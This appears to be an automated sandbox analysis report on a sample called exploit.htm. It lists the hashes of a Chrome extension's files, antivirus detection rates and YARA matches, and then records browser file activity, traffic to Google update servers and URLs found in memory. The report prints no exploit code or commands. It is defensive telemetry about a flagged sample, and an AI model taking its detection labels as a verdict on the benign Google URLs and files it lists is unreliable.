C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\bg\messages.json	UTF-8 Unicode text, with CRLF line terminators	6F8E288A9AD5B1ED8633B430E2B4D4CA	F671D3D4BEFA431D1946D706F4192D44E29B6F08	A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ca\messages.json	UTF-8 Unicode text, with CRLF line terminators	1FDAFC926391BD580B655FBAF46ED260	C95743C3F43B2B099FEBEBC5BD850F0C20E820AC	C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\cs\messages.json	UTF-8 Unicode text, with CRLF line terminators	76DEC64ED1556180B452A13C83171883	CFB1E56FD587BCDC459C1D9A683B71F9849058F9	32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\da\messages.json	UTF-8 Unicode text, with CRLF line terminators	238B97A36E411E42FF37CEFAF2927ED1	4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0	4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\de\messages.json	UTF-8 Unicode text, with CRLF line terminators	6B3E916E8C1991AA0453CBA00FEDCAAA	D6366D15912E40CA107FD42BFE9579C3336A51F9	A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\el\messages.json	UTF-8 Unicode text, with CRLF line terminators	05C437A322C1148B5F78B2F341339147	AB53003A678E44A170E73711FBD9949833BBF3AA	A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\en\messages.json	ASCII text, with CRLF line terminators	91F5BC87FD478A007EC68C4E8ADF11AC	D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6	92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\en_GB\messages.json	ASCII text, with CRLF line terminators	91F5BC87FD478A007EC68C4E8ADF11AC	D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6	92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\es\messages.json	UTF-8 Unicode text, with CRLF line terminators	82719BD3999AD66193A9B0BB525F97CD	41194D511F1ACC16C1CA828AC81C18C8C6B47287	4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\es_419\messages.json	UTF-8 Unicode text, with CRLF line terminators	6B2583D8D1C147E36A69A88009CBEBC7	4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937	6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\et\messages.json	UTF-8 Unicode text, with CRLF line terminators	CFF6CB76EC724B17C1BC920726CB35A7	14ED068251D65A840F00C05409D705259D329FFC	C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\fi\messages.json	UTF-8 Unicode text, with CRLF line terminators	3A01FEE829445C482D1721FF63153D16	F3EAAADDC03F943FC88B30B67F534AA13E3336DD	0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\fil\messages.json	ASCII text, with CRLF line terminators	57AF5B654270A945BDA8053A83353A06	EEEF7A4F869F97CF471A05D345E74F982D15E167	EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\fr\messages.json	UTF-8 Unicode text, with CRLF line terminators	8D11C90F44A6585B57B933AB38D1FFF8	3F9D44EA8807069A32AACA2AAAD02FD892E6CC90	599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\hi\messages.json	UTF-8 Unicode text, with CRLF line terminators	E376D757C8FD66AC70A7D2D49760B94E	1525C5B1312D409604F097768503298EC440CC4D	8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\hr\messages.json	UTF-8 Unicode text, with CRLF line terminators	8185D0490C86363602A137F9A261CC50	5BD933B874441CEACB9201CCC941FF67BAED6DC0	A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\hu\messages.json	UTF-8 Unicode text, with CRLF line terminators	85609CF8623582A8376C206556ED2131	1E16EB70DB5E59BB684866FF3E3925C2DEF25A12	32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\id\messages.json	ASCII text, with CRLF line terminators	EAB2B946D1232AB98137E760954003AA	60BDC2937905B311D2C9844DF2D639D7AC9F7F67	C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\it\messages.json	UTF-8 Unicode text, with CRLF line terminators	A328EEF5E841E0C72D3CD7366899C5C8	2851ED658385804E87911643F5A4200B1FB26E13	CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ja\messages.json	UTF-8 Unicode text, with CRLF line terminators	9B3A5D473C3F2BBFAEECE94A07A940B8	61BACA342CF766BBA15C7B4D892A0E7DAC9405AA	706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ko\messages.json	UTF-8 Unicode text, with CRLF line terminators	9F6B4D82A70C74CA751E2EAE70FAB5CF	0534F125FFCE8222277CF2BE3401C59DAF9217F8	D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\lt\messages.json	UTF-8 Unicode text, with CRLF line terminators	4CA644F875606986A9898D04BDAE3EA5	722A10569E93975129D67FBDB75B537D9D622AD1	7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\lv\messages.json	UTF-8 Unicode text, with CRLF line terminators	C5CE2C51391EAFD3DA9E4C71549A3C28	1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D	1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\nb\messages.json	UTF-8 Unicode text, with CRLF line terminators	93C459A23BC6953FF744C35920CD2AF9	162F884972103A08ADB616A7EB3598431A2924C5	2CD700AEB57D89C2E73333D0702556EE3FF3863516170F85669BC680FCBDC4E0
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\nl\messages.json	ASCII text, with CRLF line terminators	7A8F9D0249C680F64DEC7650A432BD57	53477198AEE389F6580921B4876719B400A23CA1	92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\pl\messages.json	UTF-8 Unicode text, with CRLF line terminators	0E6194126AFCCD1E3098D276A7400175	E8127B905A640B1C46362FA6E1127BE172F4A40F	E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\pt_BR\messages.json	UTF-8 Unicode text, with CRLF line terminators	86A2B91FA18B867209024C522ED665D5	63DEC245637818C76655E01FCB6D59784BC7184E	6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\pt_PT\messages.json	UTF-8 Unicode text, with CRLF line terminators	750A4800EDB93FBE56495963F9FB3B94	8BFB915488A4EB3CB33D68E2E59F1F8447DB7D61	C1C94F65FABAF17DEF98A8587711A56D61B1E5607500E9B01F2824DB109F9E83
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ro\messages.json	UTF-8 Unicode text, with CRLF line terminators	98D43E4B1054A65DF3FA3CC40AB6FB6D	46E0A21C4DA2BB5D4D8F837AE211C1B6FA26E7E2	113A13900CBA62FE8AED06751971C23A80A99B47F9BE219CF884D57DB19611D9
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ru\messages.json	UTF-8 Unicode text, with CRLF line terminators	DB2EDF1465946C06BD95C71A1E13AE64	FB4F3ECE9ECECEBBC6CA2A592A15FB9C1FDFB811	FBAF22CE6E16DE174CED8CB5EA3098CCA1C3426A2111FF33BD3E64DA64ED67AB
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sk\messages.json	UTF-8 Unicode text, with CRLF line terminators	8DF215D1EFBDABB175CCDD68ED8DCB0A	2B374462137A38589A73FDD00A84CBDC7E50F9F4	7FA16AF97E6CFC52EC6008EB679D3F30E7E0C24F9EF2D18A9228EAF4DED9D63B
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sl\messages.json	UTF-8 Unicode text, with CRLF line terminators	3943FA2A647AECEDFD685408B27139EE	0129DD19D28373359530B3B477FE8A9279DABB7D	18AFF072EE0DF7C3495045435C752A805606E6D5D462EF2321C443F1773F4B3A
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sr\messages.json	UTF-8 Unicode text, with CRLF line terminators	D485DF17F085B6A37125694F85646FD0	24D51D8642CDC6EFD5D8D7A4430232D8CDE25108	7FFDE34C58E7C376C042DE64DEF6481DAE32BE8B70F0B18EDF536290CBE0C818
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sv\messages.json	UTF-8 Unicode text, with CRLF line terminators	D372B8204EB743E16F45C7CBD3CAAF37	C96C57219D292B01016B37DCF82E7C79AD0DD1E8	B8BA77E0089B0676545EC16D32468B727812B444F90B33A7A5B748E6C36C4388
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\th\messages.json	UTF-8 Unicode text, with CRLF line terminators	83E2D1E97791A4B2C5C69926EFB629C9	429600425CB0F196DDD717F940E94DBD8BFF2837	2FECA577F43D97BAEEA464741D585892103585208FD0A935B810A03BDCE83C88
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\tr\messages.json	UTF-8 Unicode text, with CRLF line terminators	2CEAE0567B6BB1D240BBAD690A98CA3B	5944346FBD4A0797B13223895995CAB58E9ECD23	A7CB86F30C9C31FE5540282C308BA96ADB4EC16EF98C87129EB88105E5BEF5FC
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\uk\messages.json	UTF-8 Unicode text, with CRLF line terminators	AB0B56120E6B38C42CC3612BE948EF50	8B3F520E5713D9F116D68E71DAEED1F6E8D74629	68ABA284751EB9C856032062EF9B1651E2A1E5CE5FDA0977FFC97D63BA7BED9E
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\vi\messages.json	UTF-8 Unicode text, with CRLF line terminators	7EBB677FEAD8557D3676505225A7249A	F161B4B6001AEAEAB246FF8987F4D992B48D47BE	051F96ED874C11C4A13589B5F68964E4F5B03B52DDA223D56524F2CA23760C04
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\zh_CN\messages.json	UTF-8 Unicode text, with CRLF line terminators	BB73BF561BB79F89D9BF7C67C5AE5C65	2FADD3A1959B29C44830033A35C637D0311A8C9C	D804F2A040D21D7511EFD5213D8E1721D64964A1A0DBB48E21622CEEDC9D967E
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\zh_TW\messages.json	UTF-8 Unicode text, with CRLF line terminators	5FF50C673CC0C661D615F0CFD0E6DCA0	60DFF98DEAB9C4746B288BDD9C94B3BCAE5EAA85	C6F8C640F3353A7B9B1432A0C139C1AEEC40133800E6C9B467B63991AD660308
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_metadata\verified_contents.json	ASCII text, with very long lines, with no line terminators	0834821960CB5C6E9D477AEF649CB2E4	7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588	52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\craw_background.js	ASCII text, with very long lines	6EEBED29E6A6301E92A9B8B347807F5F	65DFB69B650560551110B33DCBA50B25E5B876DE	04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\craw_window.js	ASCII text, with very long lines	1709B6F00A136241185161AA3DF46A06	33DA7D262FFED1A5C2D85B7390E9DBC830CBE494	5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\css\craw_window.css	ASCII text	67BF9AABE17541852F9DDFF8245096CD	A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB	10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\html\craw_window.html	HTML document, ASCII text	34A839BC40DEBC746BBD181D9EF9310C	8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46	BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\flapper.gif	GIF image data, version 89a, 30 x 30	398ABB308EEBC355DA70BCE907B22E29	CFFB77B8A1724B8F81D98C6D6AD0071D10162252	2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\icon_128.png	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	4DBC9F9E6F5A08D299BAC9E54DF07694	BB38F5DE34B1E0BE1109220BA55271087A4D9EA5	91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\icon_16.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	FB9C46EA81AD3E456D90D58697C12C06	5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE	016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button.png	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	8803665A6328D23CC1014A7B0E9BE295	9DA6EE729D5A6E9F30658B8EC954710F107A641F	D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_close.png	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	0599DFD9107C7647F27E69331B0A7D75	3198C0A5F34DB67F91A0035DBC297354CBC95525	131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_hover.png	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	7CB6B9DC1A30F63B8BD976924B75AD96	0C40B0C496D2F2B5F2021C117EC8610AC03AB469	721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_maximize.png	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	232CE72808B60CBE0F4FA788A76523DF	721A9C98C835D2CD734153BBE07833C6637ECD68	AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\images\topbar_floating_button_pressed.png	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	E0862317407F2D54C85E12945799413B	FA557F8F761A04C41C9A4BA81994E43C6C275DBB	5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\manifest.json	ASCII text, with CRLF line terminators	01334FB9D092AF2AA46C4185E405C627	47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796	F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27
C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\aba93dee-0022-4bed-a4a7-ef5b2422db2c.tmp	Google Chrome extension, version 3	541F52E24FE1EF9F8E12377A6CCAE0C0	189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6	81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82

AV Detection

Source: exploit.htm	Virustotal: Detection: 48%			Perma Link
Source: exploit.htm	ReversingLabs: Detection: 34%

Exploits

Source: Yara match	File source: exploit.htm, type: SAMPLE
Source: Yara match	File source: 0000000D.00000002.668056539.000001E93CA50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.667981258.000001E93C9C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Compliance

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic			Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\2508_525662352\LICENSE.txt

Jump to behavior

Networking

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: unknown

DNS traffic detected: queries for: clients2.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: global traffic

HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: Ruleset Data.0.dr	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr, Ruleset Data.0.dr	String found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr	String found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)

Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr, pnacl_public_x86_64_pnacl_llc_nexe.0.dr	String found in binary or memory: http://llvm.org/):
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr	String found in binary or memory: https://accounts.google.com/MergeSession
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://apis.google.com
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr	String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr	String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json3.0.dr, manifest.json6.0.dr, manifest.json.0.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: pnacl_public_x86_64_ld_nexe.0.dr	String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.0.dr	String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: 4a64c5b0-4134-42a3-ade2-28be8b61b6ac.tmp.1.dr, 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, 4209d767-871b-4a94-8545-161148c1f1df.tmp.1.dr, 49e038e6-1365-429c-94f4-db117dc07b92.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://dns.google
Source: LICENSE.txt.0.dr	String found in binary or memory: https://easylist.to/)
Source: 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://fonts.googleapis.com
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com
Source: LICENSE.txt.0.dr	String found in binary or memory: https://github.com/easylist)
Source: craw_window.js.0.dr, craw_background.js.0.dr	String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json.0.dr	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://play.google.com
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr	String found in binary or memory: https://r4---sn-4g5ednz7.gvt1.com
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr	String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json.0.dr	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr	String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://www.google.com
Source: manifest.json.0.dr	String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr	String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: craw_window.js.0.dr, craw_background.js.0.dr, 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://www.googleapis.com
Source: manifest.json.0.dr	String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.0.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.0.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.0.dr	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.0.dr	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.dr	String found in binary or memory: https://www.gstatic.com

Source: unknown

